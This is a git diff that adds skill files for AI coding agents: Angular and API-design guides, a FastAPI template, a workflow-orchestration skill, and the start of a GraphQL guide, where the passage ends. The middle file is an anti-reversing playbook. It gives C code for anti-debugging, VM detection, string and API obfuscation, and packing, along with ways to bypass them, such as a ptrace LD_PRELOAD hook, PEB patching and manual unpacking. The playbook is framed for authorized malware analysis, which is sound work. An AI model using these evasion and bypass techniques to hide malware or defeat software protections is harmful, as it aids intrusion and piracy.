+| **Lazy Loading** | `@defer` and `loadComponent` | Eager load everything |
+| **DI** | `inject()` function | Constructor injection (verbose) |
+| **Inputs** | `input()` signal function | `@Input()` decorator (legacy) |
+| **Zoneless** | Enable for new projects | Force on legacy without testing |
+
+---
+
+## Resources
+
+- [Angular.dev Documentation](https://angular.dev)
+- [Angular Signals Guide](https://angular.dev/guide/signals)
+- [Angular SSR Guide](https://angular.dev/guide/ssr)
+- [Angular Update Guide](https://angular.dev/update-guide)
+- [Angular Blog](https://blog.angular.dev)
+
+---
+
+## Common Troubleshooting
+
+| Issue | Solution |
+| ------------------------------ | --------------------------------------------------- |
+| Signal not updating UI | Ensure `OnPush` + call signal as function `count()` |
+| Hydration mismatch | Check server/client content consistency |
+| Circular dependency | Use `inject()` with `forwardRef` |
+| Zoneless not detecting changes | Trigger via signal updates, not mutations |
+| SSR fetch fails | Use `TransferState` or `withFetch()` |
diff --git a/web-app/public/skills/angular/metadata.json b/web-app/public/skills/angular/metadata.json
new file mode 100644
index 00000000..13da2801
--- /dev/null
+++ b/web-app/public/skills/angular/metadata.json
@@ -0,0 +1,14 @@
+{
+ "version": "1.0.0",
+ "organization": "Antigravity Awesome Skills",
+ "date": "February 2026",
+ "abstract": "Comprehensive guide to modern Angular development (v20+) designed for AI agents and LLMs. Covers Signals, Standalone Components, Zoneless applications, SSR/Hydration, reactive patterns, routing, dependency injection, and modern forms. Emphasizes component-driven architecture with practical examples and migration strategies for modernizing existing codebases.",
+ "references": [
+ "https://angular.dev",
+ "https://angular.dev/guide/signals",
+ "https://angular.dev/guide/zoneless",
+ "https://angular.dev/guide/ssr",
+ "https://angular.dev/guide/standalone-components",
+ "https://angular.dev/guide/defer"
+ ]
+}
diff --git a/web-app/public/skills/anti-reversing-techniques/SKILL.md b/web-app/public/skills/anti-reversing-techniques/SKILL.md
index 9ebebfe6..9ac58193 100644
--- a/web-app/public/skills/anti-reversing-techniques/SKILL.md
+++ b/web-app/public/skills/anti-reversing-techniques/SKILL.md
@@ -3,6 +3,7 @@ name: anti-reversing-techniques
description: "Understand anti-reversing, obfuscation, and protection techniques encountered during software analysis. Use when analyzing protected binaries, bypassing anti-debugging for authorized analysis, or u..."
risk: unknown
source: community
+date_added: "2026-02-27"
---
> **AUTHORIZED USE ONLY**: This skill contains dual-use security techniques. Before proceeding with any bypass or analysis:
diff --git a/web-app/public/skills/anti-reversing-techniques/resources/implementation-playbook.md b/web-app/public/skills/anti-reversing-techniques/resources/implementation-playbook.md
new file mode 100644
index 00000000..dc470125
--- /dev/null
+++ b/web-app/public/skills/anti-reversing-techniques/resources/implementation-playbook.md
@@ -0,0 +1,539 @@
+# Anti-Reversing Techniques Implementation Playbook
+
+This file contains detailed patterns, checklists, and code samples referenced by the skill.
+
+# Anti-Reversing Techniques
+
+Understanding protection mechanisms encountered during authorized software analysis, security research, and malware analysis. This knowledge helps analysts bypass protections to complete legitimate analysis tasks.
+
+## Anti-Debugging Techniques
+
+### Windows Anti-Debugging
+
+#### API-Based Detection
+
+```c
+// IsDebuggerPresent
+if (IsDebuggerPresent()) {
+ exit(1);
+}
+
+// CheckRemoteDebuggerPresent
+BOOL debugged = FALSE;
+CheckRemoteDebuggerPresent(GetCurrentProcess(), &debugged);
+if (debugged) exit(1);
+
+// NtQueryInformationProcess
+typedef NTSTATUS (NTAPI *pNtQueryInformationProcess)(
+ HANDLE, PROCESSINFOCLASS, PVOID, ULONG, PULONG);
+
+DWORD debugPort = 0;
+NtQueryInformationProcess(
+ GetCurrentProcess(),
+ ProcessDebugPort, // 7
+ &debugPort,
+ sizeof(debugPort),
+ NULL
+);
+if (debugPort != 0) exit(1);
+
+// Debug flags
+DWORD debugFlags = 0;
+NtQueryInformationProcess(
+ GetCurrentProcess(),
+ ProcessDebugFlags, // 0x1F
+ &debugFlags,
+ sizeof(debugFlags),
+ NULL
+);
+if (debugFlags == 0) exit(1); // 0 means being debugged
+```
+
+**Bypass Approaches:**
+```python
+# x64dbg: ScyllaHide plugin
+# Patches common anti-debug checks
+
+# Manual patching in debugger:
+# - Set IsDebuggerPresent return to 0
+# - Patch PEB.BeingDebugged to 0
+# - Hook NtQueryInformationProcess
+
+# IDAPython: Patch checks
+ida_bytes.patch_byte(check_addr, 0x90) # NOP
+```
+
+#### PEB-Based Detection
+
+```c
+// Direct PEB access
+#ifdef _WIN64
+ PPEB peb = (PPEB)__readgsqword(0x60);
+#else
+ PPEB peb = (PPEB)__readfsdword(0x30);
+#endif
+
+// BeingDebugged flag
+if (peb->BeingDebugged) exit(1);
+
+// NtGlobalFlag
+// Debugged: 0x70 (FLG_HEAP_ENABLE_TAIL_CHECK |
+// FLG_HEAP_ENABLE_FREE_CHECK |
+// FLG_HEAP_VALIDATE_PARAMETERS)
+if (peb->NtGlobalFlag & 0x70) exit(1);
+
+// Heap flags
+PDWORD heapFlags = (PDWORD)((PBYTE)peb->ProcessHeap + 0x70);
+if (*heapFlags & 0x50000062) exit(1);
+```
+
+**Bypass Approaches:**
+```assembly
+; In debugger, modify PEB directly
+; x64dbg: dump at gs:[60] (x64) or fs:[30] (x86)
+; Set BeingDebugged (offset 2) to 0
+; Clear NtGlobalFlag (offset 0xBC for x64)
+```
+
+#### Timing-Based Detection
+
+```c
+// RDTSC timing
+uint64_t start = __rdtsc();
+// ... some code ...
+uint64_t end = __rdtsc();
+if ((end - start) > THRESHOLD) exit(1);
+
+// QueryPerformanceCounter
+LARGE_INTEGER start, end, freq;
+QueryPerformanceFrequency(&freq);
+QueryPerformanceCounter(&start);
+// ... code ...
+QueryPerformanceCounter(&end);
+double elapsed = (double)(end.QuadPart - start.QuadPart) / freq.QuadPart;
+if (elapsed > 0.1) exit(1); // Too slow = debugger
+
+// GetTickCount
+DWORD start = GetTickCount();
+// ... code ...
+if (GetTickCount() - start > 1000) exit(1);
+```
+
+**Bypass Approaches:**
+```
+- Use hardware breakpoints instead of software
+- Patch timing checks
+- Use VM with controlled time
+- Hook timing APIs to return consistent values
+```
+
+#### Exception-Based Detection
+
+```c
+// SEH-based detection
+__try {
+ __asm { int 3 } // Software breakpoint
+}
+__except(EXCEPTION_EXECUTE_HANDLER) {
+ // Normal execution: exception caught
+ return;
+}
+// Debugger ate the exception
+exit(1);
+
+// VEH-based detection
+LONG CALLBACK VectoredHandler(PEXCEPTION_POINTERS ep) {
+ if (ep->ExceptionRecord->ExceptionCode == EXCEPTION_BREAKPOINT) {
+ ep->ContextRecord->Rip++; // Skip INT3
+ return EXCEPTION_CONTINUE_EXECUTION;
+ }
+ return EXCEPTION_CONTINUE_SEARCH;
+}
+```
+
+### Linux Anti-Debugging
+
+```c
+// ptrace self-trace
+if (ptrace(PTRACE_TRACEME, 0, NULL, NULL) == -1) {
+ // Already being traced
+ exit(1);
+}
+
+// /proc/self/status
+FILE *f = fopen("/proc/self/status", "r");
+char line[256];
+while (fgets(line, sizeof(line), f)) {
+ if (strncmp(line, "TracerPid:", 10) == 0) {
+ int tracer_pid = atoi(line + 10);
+ if (tracer_pid != 0) exit(1);
+ }
+}
+
+// Parent process check
+if (getppid() != 1 && strcmp(get_process_name(getppid()), "bash") != 0) {
+ // Unusual parent (might be debugger)
+}
+```
+
+**Bypass Approaches:**
+```bash
+# LD_PRELOAD to hook ptrace
+# Compile: gcc -shared -fPIC -o hook.so hook.c
+long ptrace(int request, ...) {
+ return 0; // Always succeed
+}
+
+# Usage
+LD_PRELOAD=./hook.so ./target
+```
+
+## Anti-VM Detection
+
+### Hardware Fingerprinting
+
+```c
+// CPUID-based detection
+int cpuid_info[4];
+__cpuid(cpuid_info, 1);
+// Check hypervisor bit (bit 31 of ECX)
+if (cpuid_info[2] & (1 << 31)) {
+ // Running in hypervisor
+}
+
+// CPUID brand string
+__cpuid(cpuid_info, 0x40000000);
+char vendor[13] = {0};
+memcpy(vendor, &cpuid_info[1], 12);
+// "VMwareVMware", "Microsoft Hv", "KVMKVMKVM", "VBoxVBoxVBox"
+
+// MAC address prefix
+// VMware: 00:0C:29, 00:50:56
+// VirtualBox: 08:00:27
+// Hyper-V: 00:15:5D
+```
+
+### Registry/File Detection
+
+```c
+// Windows registry keys
+// HKLM\SOFTWARE\VMware, Inc.\VMware Tools
+// HKLM\SOFTWARE\Oracle\VirtualBox Guest Additions
+// HKLM\HARDWARE\ACPI\DSDT\VBOX__
+
+// Files
+// C:\Windows\System32\drivers\vmmouse.sys
+// C:\Windows\System32\drivers\vmhgfs.sys
+// C:\Windows\System32\drivers\VBoxMouse.sys
+
+// Processes
+// vmtoolsd.exe, vmwaretray.exe
+// VBoxService.exe, VBoxTray.exe
+```
+
+### Timing-Based VM Detection
+
+```c
+// VM exits cause timing anomalies
+uint64_t start = __rdtsc();
+__cpuid(cpuid_info, 0); // Causes VM exit
+uint64_t end = __rdtsc();
+if ((end - start) > 500) {
+ // Likely in VM (CPUID takes longer)
+}
+```
+
+**Bypass Approaches:**
+```
+- Use bare-metal analysis environment
+- Harden VM (remove guest tools, change MAC)
+- Patch detection code
+- Use specialized analysis VMs (FLARE-VM)
+```
+
+## Code Obfuscation
+
+### Control Flow Obfuscation
+
+#### Control Flow Flattening
+
+```c
+// Original
+if (cond) {
+ func_a();
+} else {
+ func_b();
+}
+func_c();
+
+// Flattened
+int state = 0;
+while (1) {
+ switch (state) {
+ case 0:
+ state = cond ? 1 : 2;
+ break;
+ case 1:
+ func_a();
+ state = 3;
+ break;
+ case 2:
+ func_b();
+ state = 3;
+ break;
+ case 3:
+ func_c();
+ return;
+ }
+}
+```
+
+**Analysis Approach:**
+- Identify state variable
+- Map state transitions
+- Reconstruct original flow
+- Tools: D-810 (IDA), SATURN
+
+#### Opaque Predicates
+
+```c
+// Always true, but complex to analyze
+int x = rand();
+if ((x * x) >= 0) { // Always true
+ real_code();
+} else {
+ junk_code(); // Dead code
+}
+
+// Always false
+if ((x * (x + 1)) % 2 == 1) { // Product of consecutive = even
+ junk_code();
+}
+```
+
+**Analysis Approach:**
+- Identify constant expressions
+- Symbolic execution to prove predicates
+- Pattern matching for known opaque predicates
+
+### Data Obfuscation
+
+#### String Encryption
+
+```c
+// XOR encryption
+char decrypt_string(char *enc, int len, char key) {
+ char *dec = malloc(len + 1);
+ for (int i = 0; i < len; i++) {
+ dec[i] = enc[i] ^ key;
+ }
+ dec[len] = 0;
+ return dec;
+}
+
+// Stack strings
+char url[20];
+url[0] = 'h'; url[1] = 't'; url[2] = 't'; url[3] = 'p';
+url[4] = ':'; url[5] = '/'; url[6] = '/';
+// ...
+```
+
+**Analysis Approach:**
+```python
+# FLOSS for automatic string deobfuscation
+floss malware.exe
+
+# IDAPython string decryption
+def decrypt_xor(ea, length, key):
+ result = ""
+ for i in range(length):
+ byte = ida_bytes.get_byte(ea + i)
+ result += chr(byte ^ key)
+ return result
+```
+
+#### API Obfuscation
+
+```c
+// Dynamic API resolution
+typedef HANDLE (WINAPI *pCreateFileW)(LPCWSTR, DWORD, DWORD,
+ LPSECURITY_ATTRIBUTES, DWORD, DWORD, HANDLE);
+
+HMODULE kernel32 = LoadLibraryA("kernel32.dll");
+pCreateFileW myCreateFile = (pCreateFileW)GetProcAddress(
+ kernel32, "CreateFileW");
+
+// API hashing
+DWORD hash_api(char *name) {
+ DWORD hash = 0;
+ while (*name) {
+ hash = ((hash >> 13) | (hash << 19)) + *name++;
+ }
+ return hash;
+}
+// Resolve by hash comparison instead of string
+```
+
+**Analysis Approach:**
+- Identify hash algorithm
+- Build hash database of known APIs
+- Use HashDB plugin for IDA
+- Dynamic analysis to resolve at runtime
+
+### Instruction-Level Obfuscation
+
+#### Dead Code Insertion
+
+```asm
+; Original
+mov eax, 1
+
+; With dead code
+push ebx ; Dead
+mov eax, 1
+pop ebx ; Dead
+xor ecx, ecx ; Dead
+add ecx, ecx ; Dead
+```
+
+#### Instruction Substitution
+
+```asm
+; Original: xor eax, eax (set to 0)
+; Substitutions:
+sub eax, eax
+mov eax, 0
+and eax, 0
+lea eax, [0]
+
+; Original: mov eax, 1
+; Substitutions:
+xor eax, eax
+inc eax
+
+push 1
+pop eax
+```
+
+## Packing and Encryption
+
+### Common Packers
+
+```
+UPX - Open source, easy to unpack
+Themida - Commercial, VM-based protection
+VMProtect - Commercial, code virtualization
+ASPack - Compression packer
+PECompact - Compression packer
+Enigma - Commercial protector
+```
+
+### Unpacking Methodology
+
+```
+1. Identify packer (DIE, Exeinfo PE, PEiD)
+
+2. Static unpacking (if known packer):
+ - UPX: upx -d packed.exe
+ - Use existing unpackers
+
+3. Dynamic unpacking:
+ a. Find Original Entry Point (OEP)
+ b. Set breakpoint on OEP
+ c. Dump memory when OEP reached
+ d. Fix import table (Scylla, ImpREC)
+
+4. OEP finding techniques:
+ - Hardware breakpoint on stack (ESP trick)
+ - Break on common API calls (GetCommandLineA)
+ - Trace and look for typical entry patterns
+```
+
+### Manual Unpacking Example
+
+```
+1. Load packed binary in x64dbg
+2. Note entry point (packer stub)
+3. Use ESP trick:
+ - Run to entry
+ - Set hardware breakpoint on [ESP]
+ - Run until breakpoint hits (after PUSHAD/POPAD)
+4. Look for JMP to OEP
+5. At OEP, use Scylla to:
+ - Dump process
+ - Find imports (IAT autosearch)
+ - Fix dump
+```
+
+## Virtualization-Based Protection
+
+### Code Virtualization
+
+```
+Original x86 code is converted to custom bytecode
+interpreted by embedded VM at runtime.
+
+Original: VM Protected:
+mov eax, 1 push vm_context
+add eax, 2 call vm_entry
+ ; VM interprets bytecode
+ ; equivalent to original
+```
+
+### Analysis Approaches
+
+```
+1. Identify VM components:
+ - VM entry (dispatcher)
+ - Handler table
+ - Bytecode location
+ - Virtual registers/stack
+
+2. Trace execution:
+ - Log handler calls
+ - Map bytecode to operations
+ - Understand instruction set
+
+3. Lifting/devirtualization:
+ - Map VM instructions back to native
+ - Tools: VMAttack, SATURN, NoVmp
+
+4. Symbolic execution:
+ - Analyze VM semantically
+ - angr, Triton
+```
+
+## Bypass Strategies Summary
+
+### General Principles
+
+1. **Understand the protection**: Identify what technique is used
+2. **Find the check**: Locate protection code in binary
+3. **Patch or hook**: Modify check to always pass
+4. **Use appropriate tools**: ScyllaHide, x64dbg plugins
+5. **Document findings**: Keep notes on bypassed protections
+
+### Tool Recommendations
+
+```
+Anti-debug bypass: ScyllaHide, TitanHide
+Unpacking: x64dbg + Scylla, OllyDumpEx
+Deobfuscation: D-810, SATURN, miasm
+VM analysis: VMAttack, NoVmp, manual tracing
+String decryption: FLOSS, custom scripts
+Symbolic execution: angr, Triton
+```
+
+### Ethical Considerations
+
+This knowledge should only be used for:
+- Authorized security research
+- Malware analysis (defensive)
+- CTF competitions
+- Understanding protections for legitimate purposes
+- Educational purposes
+
+Never use to bypass protections for:
+- Software piracy
+- Unauthorized access
+- Malicious purposes
diff --git a/web-app/public/skills/antigravity-workflows/SKILL.md b/web-app/public/skills/antigravity-workflows/SKILL.md
new file mode 100644
index 00000000..48cc1540
--- /dev/null
+++ b/web-app/public/skills/antigravity-workflows/SKILL.md
@@ -0,0 +1,81 @@
+---
+name: antigravity-workflows
+description: "Orchestrate multiple Antigravity skills through guided workflows for SaaS MVP delivery, security audits, AI agent builds, and browser QA."
+risk: none
+source: self
+date_added: "2026-02-27"
+---
+
+# Antigravity Workflows
+
+Use this skill to turn a complex objective into a guided sequence of skill invocations.
+
+## When to Use This Skill
+
+Use this skill when:
+- The user wants to combine several skills without manually selecting each one.
+- The goal is multi-phase (for example: plan, build, test, ship).
+- The user asks for best-practice execution for common scenarios like:
+ - Shipping a SaaS MVP
+ - Running a web security audit
+ - Building an AI agent system
+ - Implementing browser automation and E2E QA
+
+## Workflow Source of Truth
+
+Read workflows in this order:
+1. `docs/WORKFLOWS.md` for human-readable playbooks.
+2. `data/workflows.json` for machine-readable workflow metadata.
+
+## How to Run This Skill
+
+1. Identify the user's concrete outcome.
+2. Propose the 1-2 best matching workflows.
+3. Ask the user to choose one.
+4. Execute step-by-step:
+ - Announce current step and expected artifact.
+ - Invoke recommended skills for that step.
+ - Verify completion criteria before moving to next step.
+5. At the end, provide:
+ - Completed artifacts
+ - Validation evidence
+ - Remaining risks and next actions
+
+## Default Workflow Routing
+
+- Product delivery request -> `ship-saas-mvp`
+- Security review request -> `security-audit-web-app`
+- Agent/LLM product request -> `build-ai-agent-system`
+- E2E/browser testing request -> `qa-browser-automation`
+
+## Copy-Paste Prompts
+
+```text
+Use @antigravity-workflows to run the "Ship a SaaS MVP" workflow for my project idea.
+```
+
+```text
+Use @antigravity-workflows and execute a full "Security Audit for a Web App" workflow.
+```
+
+```text
+Use @antigravity-workflows to guide me through "Build an AI Agent System" with checkpoints.
+```
+
+```text
+Use @antigravity-workflows to execute the "QA and Browser Automation" workflow and stabilize flaky tests.
+```
+
+## Limitations
+
+- This skill orchestrates; it does not replace specialized skills.
+- It depends on the local availability of referenced skills.
+- It does not guarantee success without environment access, credentials, or required infrastructure.
+- For stack-specific browser automation in Go, `go-playwright` may require the corresponding skill to be present in your local skills repository.
+
+## Related Skills
+
+- `concise-planning`
+- `brainstorming`
+- `workflow-automation`
+- `verification-before-completion`
diff --git a/web-app/public/skills/antigravity-workflows/resources/implementation-playbook.md b/web-app/public/skills/antigravity-workflows/resources/implementation-playbook.md
new file mode 100644
index 00000000..9db5deb7
--- /dev/null
+++ b/web-app/public/skills/antigravity-workflows/resources/implementation-playbook.md
@@ -0,0 +1,36 @@
+# Antigravity Workflows Implementation Playbook
+
+This document explains how an agent should execute workflow-based orchestration.
+
+## Execution Contract
+
+For every workflow:
+
+1. Confirm objective and scope.
+2. Select the best-matching workflow.
+3. Execute workflow steps in order.
+4. Produce one concrete artifact per step.
+5. Validate before continuing.
+
+## Step Artifact Examples
+
+- Plan step -> scope document or milestone checklist.
+- Build step -> code changes and implementation notes.
+- Test step -> test results and failure triage.
+- Release step -> rollout checklist and risk log.
+
+## Safety Guardrails
+
+- Never run destructive actions without explicit user approval.
+- If a required skill is missing, state the gap and fallback to closest available skill.
+- When security testing is involved, ensure authorization is explicit.
+
+## Suggested Completion Format
+
+At workflow completion, return:
+
+1. Completed steps
+2. Artifacts produced
+3. Validation evidence
+4. Open risks
+5. Suggested next action
diff --git a/web-app/public/skills/api-design-principles/SKILL.md b/web-app/public/skills/api-design-principles/SKILL.md
index 836094bb..eacdb62b 100644
--- a/web-app/public/skills/api-design-principles/SKILL.md
+++ b/web-app/public/skills/api-design-principles/SKILL.md
@@ -3,6 +3,7 @@ name: api-design-principles
description: "Master REST and GraphQL API design principles to build intuitive, scalable, and maintainable APIs that delight developers. Use when designing new APIs, reviewing API specifications, or establishing..."
risk: unknown
source: community
+date_added: "2026-02-27"
---
# API Design Principles
diff --git a/web-app/public/skills/api-design-principles/assets/api-design-checklist.md b/web-app/public/skills/api-design-principles/assets/api-design-checklist.md
new file mode 100644
index 00000000..b78148bf
--- /dev/null
+++ b/web-app/public/skills/api-design-principles/assets/api-design-checklist.md
@@ -0,0 +1,155 @@
+# API Design Checklist
+
+## Pre-Implementation Review
+
+### Resource Design
+
+- [ ] Resources are nouns, not verbs
+- [ ] Plural names for collections
+- [ ] Consistent naming across all endpoints
+- [ ] Clear resource hierarchy (avoid deep nesting >2 levels)
+- [ ] All CRUD operations properly mapped to HTTP methods
+
+### HTTP Methods
+
+- [ ] GET for retrieval (safe, idempotent)
+- [ ] POST for creation
+- [ ] PUT for full replacement (idempotent)
+- [ ] PATCH for partial updates
+- [ ] DELETE for removal (idempotent)
+
+### Status Codes
+
+- [ ] 200 OK for successful GET/PATCH/PUT
+- [ ] 201 Created for POST
+- [ ] 204 No Content for DELETE
+- [ ] 400 Bad Request for malformed requests
+- [ ] 401 Unauthorized for missing auth
+- [ ] 403 Forbidden for insufficient permissions
+- [ ] 404 Not Found for missing resources
+- [ ] 422 Unprocessable Entity for validation errors
+- [ ] 429 Too Many Requests for rate limiting
+- [ ] 500 Internal Server Error for server issues
+
+### Pagination
+
+- [ ] All collection endpoints paginated
+- [ ] Default page size defined (e.g., 20)
+- [ ] Maximum page size enforced (e.g., 100)
+- [ ] Pagination metadata included (total, pages, etc.)
+- [ ] Cursor-based or offset-based pattern chosen
+
+### Filtering & Sorting
+
+- [ ] Query parameters for filtering
+- [ ] Sort parameter supported
+- [ ] Search parameter for full-text search
+- [ ] Field selection supported (sparse fieldsets)
+
+### Versioning
+
+- [ ] Versioning strategy defined (URL/header/query)
+- [ ] Version included in all endpoints
+- [ ] Deprecation policy documented
+
+### Error Handling
+
+- [ ] Consistent error response format
+- [ ] Detailed error messages
+- [ ] Field-level validation errors
+- [ ] Error codes for client handling
+- [ ] Timestamps in error responses
+
+### Authentication & Authorization
+
+- [ ] Authentication method defined (Bearer token, API key)
+- [ ] Authorization checks on all endpoints
+- [ ] 401 vs 403 used correctly
+- [ ] Token expiration handled
+
+### Rate Limiting
+
+- [ ] Rate limits defined per endpoint/user
+- [ ] Rate limit headers included
+- [ ] 429 status code for exceeded limits
+- [ ] Retry-After header provided
+
+### Documentation
+
+- [ ] OpenAPI/Swagger spec generated
+- [ ] All endpoints documented
+- [ ] Request/response examples provided
+- [ ] Error responses documented
+- [ ] Authentication flow documented
+
+### Testing
+
+- [ ] Unit tests for business logic
+- [ ] Integration tests for endpoints
+- [ ] Error scenarios tested
+- [ ] Edge cases covered
+- [ ] Performance tests for heavy endpoints
+
+### Security
+
+- [ ] Input validation on all fields
+- [ ] SQL injection prevention
+- [ ] XSS prevention
+- [ ] CORS configured correctly
+- [ ] HTTPS enforced
+- [ ] Sensitive data not in URLs
+- [ ] No secrets in responses
+
+### Performance
+
+- [ ] Database queries optimized
+- [ ] N+1 queries prevented
+- [ ] Caching strategy defined
+- [ ] Cache headers set appropriately
+- [ ] Large responses paginated
+
+### Monitoring
+
+- [ ] Logging implemented
+- [ ] Error tracking configured
+- [ ] Performance metrics collected
+- [ ] Health check endpoint available
+- [ ] Alerts configured for errors
+
+## GraphQL-Specific Checks
+
+### Schema Design
+
+- [ ] Schema-first approach used
+- [ ] Types properly defined
+- [ ] Non-null vs nullable decided
+- [ ] Interfaces/unions used appropriately
+- [ ] Custom scalars defined
+
+### Queries
+
+- [ ] Query depth limiting
+- [ ] Query complexity analysis
+- [ ] DataLoaders prevent N+1
+- [ ] Pagination pattern chosen (Relay/offset)
+
+### Mutations
+
+- [ ] Input types defined
+- [ ] Payload types with errors
+- [ ] Optimistic response support
+- [ ] Idempotency considered
+
+### Performance
+
+- [ ] DataLoader for all relationships
+- [ ] Query batching enabled
+- [ ] Persisted queries considered
+- [ ] Response caching implemented
+
+### Documentation
+
+- [ ] All fields documented
+- [ ] Deprecations marked
+- [ ] Examples provided
+- [ ] Schema introspection enabled
diff --git a/web-app/public/skills/api-design-principles/assets/rest-api-template.py b/web-app/public/skills/api-design-principles/assets/rest-api-template.py
new file mode 100644
index 00000000..2a78401e
--- /dev/null
+++ b/web-app/public/skills/api-design-principles/assets/rest-api-template.py
@@ -0,0 +1,182 @@
+"""
+Production-ready REST API template using FastAPI.
+Includes pagination, filtering, error handling, and best practices.
+"""
+
+from fastapi import FastAPI, HTTPException, Query, Path, Depends, status
+from fastapi.middleware.cors import CORSMiddleware
+from fastapi.middleware.trustedhost import TrustedHostMiddleware
+from fastapi.responses import JSONResponse
+from pydantic import BaseModel, Field, EmailStr, ConfigDict
+from typing import Optional, List, Any
+from datetime import datetime
+from enum import Enum
+
+app = FastAPI(
+ title="API Template",
+ version="1.0.0",
+ docs_url="/api/docs"
+)
+
+# Security Middleware
+# Trusted Host: Prevents HTTP Host Header attacks
+app.add_middleware(
+ TrustedHostMiddleware,
+ allowed_hosts=["*"] # TODO: Configure this in production, e.g. ["api.example.com"]
+)
+
+# CORS: Configures Cross-Origin Resource Sharing
+app.add_middleware(
+ CORSMiddleware,
+ allow_origins=["*"], # TODO: Update this with specific origins in production
+ allow_credentials=False, # TODO: Set to True if you need cookies/auth headers, but restrict origins
+ allow_methods=["*"],
+ allow_headers=["*"],
+)
+
+# Models
+class UserStatus(str, Enum):
+ ACTIVE = "active"
+ INACTIVE = "inactive"
+ SUSPENDED = "suspended"
+
+class UserBase(BaseModel):
+ email: EmailStr
+ name: str = Field(..., min_length=1, max_length=100)
+ status: UserStatus = UserStatus.ACTIVE
+
+class UserCreate(UserBase):
+ password: str = Field(..., min_length=8)
+
+class UserUpdate(BaseModel):
+ email: Optional[EmailStr] = None
+ name: Optional[str] = Field(None, min_length=1, max_length=100)
+ status: Optional[UserStatus] = None
+
+class User(UserBase):
+ id: str
+ created_at: datetime
+ updated_at: datetime
+
+ model_config = ConfigDict(from_attributes=True)
+
+# Pagination
+class PaginationParams(BaseModel):
+ page: int = Field(1, ge=1)
+ page_size: int = Field(20, ge=1, le=100)
+
+class PaginatedResponse(BaseModel):
+ items: List[Any]
+ total: int
+ page: int
+ page_size: int
+ pages: int
+
+# Error handling
+class ErrorDetail(BaseModel):
+ field: Optional[str] = None
+ message: str
+ code: str
+
+class ErrorResponse(BaseModel):
+ error: str
+ message: str
+ details: Optional[List[ErrorDetail]] = None
+
+@app.exception_handler(HTTPException)
+async def http_exception_handler(request, exc):
+ return JSONResponse(
+ status_code=exc.status_code,
+ content=ErrorResponse(
+ error=exc.__class__.__name__,
+ message=exc.detail if isinstance(exc.detail, str) else exc.detail.get("message", "Error"),
+ details=exc.detail.get("details") if isinstance(exc.detail, dict) else None
+ ).model_dump()
+ )
+
+# Endpoints
+@app.get("/api/users", response_model=PaginatedResponse, tags=["Users"])
+async def list_users(
+ page: int = Query(1, ge=1),
+ page_size: int = Query(20, ge=1, le=100),
+ status: Optional[UserStatus] = Query(None),
+ search: Optional[str] = Query(None)
+):
+ """List users with pagination and filtering."""
+ # Mock implementation
+ total = 100
+ items = [
+ User(
+ id=str(i),
+ email=f"user{i}@example.com",
+ name=f"User {i}",
+ status=UserStatus.ACTIVE,
+ created_at=datetime.now(),
+ updated_at=datetime.now()
+ ).model_dump()
+ for i in range((page-1)*page_size, min(page*page_size, total))
+ ]
+
+ return PaginatedResponse(
+ items=items,
+ total=total,
+ page=page,
+ page_size=page_size,
+ pages=(total + page_size - 1) // page_size
+ )
+
+@app.post("/api/users", response_model=User, status_code=status.HTTP_201_CREATED, tags=["Users"])
+async def create_user(user: UserCreate):
+ """Create a new user."""
+ # Mock implementation
+ return User(
+ id="123",
+ email=user.email,
+ name=user.name,
+ status=user.status,
+ created_at=datetime.now(),
+ updated_at=datetime.now()
+ )
+
+@app.get("/api/users/{user_id}", response_model=User, tags=["Users"])
+async def get_user(user_id: str = Path(..., description="User ID")):
+ """Get user by ID."""
+ # Mock: Check if exists
+ if user_id == "999":
+ raise HTTPException(
+ status_code=status.HTTP_404_NOT_FOUND,
+ detail={"message": "User not found", "details": {"id": user_id}}
+ )
+
+ return User(
+ id=user_id,
+ email="user@example.com",
+ name="User Name",
+ status=UserStatus.ACTIVE,
+ created_at=datetime.now(),
+ updated_at=datetime.now()
+ )
+
+@app.patch("/api/users/{user_id}", response_model=User, tags=["Users"])
+async def update_user(user_id: str, update: UserUpdate):
+ """Partially update user."""
+ # Validate user exists
+ existing = await get_user(user_id)
+
+ # Apply updates
+ update_data = update.model_dump(exclude_unset=True)
+ for field, value in update_data.items():
+ setattr(existing, field, value)
+
+ existing.updated_at = datetime.now()
+ return existing
+
+@app.delete("/api/users/{user_id}", status_code=status.HTTP_204_NO_CONTENT, tags=["Users"])
+async def delete_user(user_id: str):
+ """Delete user."""
+ await get_user(user_id) # Verify exists
+ return None
+
+if __name__ == "__main__":
+ import uvicorn
+ uvicorn.run(app, host="0.0.0.0", port=8000)
diff --git a/web-app/public/skills/api-design-principles/references/graphql-schema-design.md b/web-app/public/skills/api-design-principles/references/graphql-schema-design.md
new file mode 100644
index 00000000..beca5f4f
--- /dev/null
+++ b/web-app/public/skills/api-design-principles/references/graphql-schema-design.md
@@ -0,0 +1,583 @@
+# GraphQL Schema Design Patterns
+
+## Schema Organization
+
+### Modular Schema Structure
+
+```graphql
+# user.graphql
+type User {
+ id: ID!
+ email: String!
+ name: String!
+ posts: [Post!]!
+}
+
+extend type Query {
+ user(id: ID!): User
+ users(first: Int, after: String): UserConnection!
+}
+
+extend type Mutation {
+ createUser(input: CreateUserInput!): CreateUserPayload!
+}
+
+# post.graphql
+type Post {
+ id: ID!
+ title: String!
+ content: String!
+ author: User!
+}
+
+extend type Query {
+ post(id: ID!): Post
+}
+```
+
+## Type Design Patterns
+
+### 1. Non-Null Types
+
+```graphql
+type User {
+ id: ID! # Always required
+ email: String! # Required
+ phone: String # Optional (nullable)
+ posts: [Post!]! # Non-null array of non-null posts
+ tags: [String!] # Nullable array of non-null strings
+}
+```
+
+### 2. Interfaces for Polymorphism
+
+```graphql
+interface Node {
+ id: ID!
+ createdAt: DateTime!
+}
+
+type User implements Node {
+ id: ID!
+ createdAt: DateTime!
+ email: String!
+}
+
+type Post implements Node {
+ id: ID!
+ createdAt: DateTime!
+ title: String!
+}
+
+type Query {
+ node(id: ID!): Node
+}
+```
+
+### 3. Unions for Heterogeneous Results
+
+```graphql
+union SearchResult = User | Post | Comment
+
+type Query {
+ search(query: String!): [SearchResult!]!
+}
+
+# Query example
+{
+ search(query: "graphql") {
+ ... on User {
+ name
+ email
+ }
+ ... on Post {
+ title
+ content
+ }
+ ... on Comment {
+ text
+ author {
+ name
+ }
+ }
+ }
+}
+```
+
+### 4. Input Types
+
+```graphql
+input CreateUserInput {
+ email: String!
+ name: String!
+ password: String!
+ profileInput: ProfileInput
+}
+
+input ProfileInput {
+ bio: String
+ avatar: String
+ website: String
+}
+
+input UpdateUserInput {
+ id: ID!
+ email: String
+ name: String
+ profileInput: ProfileInput
+}
+```
+
+## Pagination Patterns
+
+### Relay Cursor Pagination (Recommended)
+
+```graphql
